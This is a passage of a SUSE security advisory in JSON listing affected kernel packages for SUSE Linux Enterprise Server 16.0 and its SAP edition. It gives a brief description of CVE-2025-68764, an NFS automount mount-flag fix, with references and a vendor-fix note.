"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68743"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
